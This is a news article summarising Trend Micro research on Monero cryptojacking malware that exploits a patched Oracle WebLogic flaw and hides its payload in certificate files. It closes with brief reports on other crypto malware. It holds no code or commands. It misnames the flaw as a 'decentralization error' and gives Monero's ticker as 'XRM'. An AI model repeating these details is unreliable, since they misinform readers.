New cryptocurrency mining malware is exploiting a vulnerability in the Oracle WebLogic Server while it hides in plain sight.
Cybersecurity researchers at Trend Micro are reporting that hackers are exploiting the vulnerability to install cryptojacking malware that is used to mine Monero (XRM).
An ‘interesting twist’
The exploit was made possible by a decentralization error, which has been addressed by a security patch in April.
However, news has surfaced on the InfoSec forums that hackers have actively exploited the vulnerability (CVE-2019-2725) to install cryptocurrency mining malware on the systems of unsuspecting victims.
Trend Micro has analyzed the data and found “an interesting twist” in regards to this latest cryptojacking campaign.
The cryptojacking malware hides in plain sight by hiding its code in certificate files.
Trend Micro notes that the use of certificate files to hide malware is not a new tactic, but it can be highly effective.
“By using certificate files for obfuscation purposes, a piece of malware can possibly evade detection since the downloaded file is in a certificate file format which is seen as normal -— especially when establishing HTTPS connections,” Trend Micro notes.
Other malicious files not hidden
The security report explains that the cryptocurrency mining malware executes a PowerShell command when it exploits the vulnerability.
This command then downloads a certificate file from the attacker’s command-and-control server.
Researchers note that when the PowerShell command is given, other malicious files besides the Monero cryptojacking malware are also downloaded.
However, these additional files are not hidden behind the certificate file, which Trend Micro says might indicate that the “obfuscation method is currently being tested for its effectiveness, with its expansion to other malware variants pegged at a later date.”
Overall, Trend Micro recommends that companies using the Oracle WebLogic Server update to the latest patch to fix the security vulnerability.
Crypto malware reports abound
The digital realm can often be treacherous as malicious attackers develop and release new forms of malware.
One cryptocurrency mining malware, dubbed Beapy, is based upon the NSA exploits that were stolen two years ago.
Researchers say that Beapy recently reached 12,000 unique infections spread across more than 700 companies, the majority of which are located in China.
Two malicious cryptocurrency-stealing apps that centered around wallets were recently removed from the Google Play store, although they had already been downloaded more than a thousand times.
A current Bitcoin scam targets victims by offering free cryptocurrency through the installation of a “Bitcoin Collector” program that supposedly would generate a small amount of free BTC every day.
However, malware would actually be installed instead.
The original form of the malware took the form of ransomware, but it appears that such attempts met with little success so the malware was morphed into a Trojan designed to steal information instead.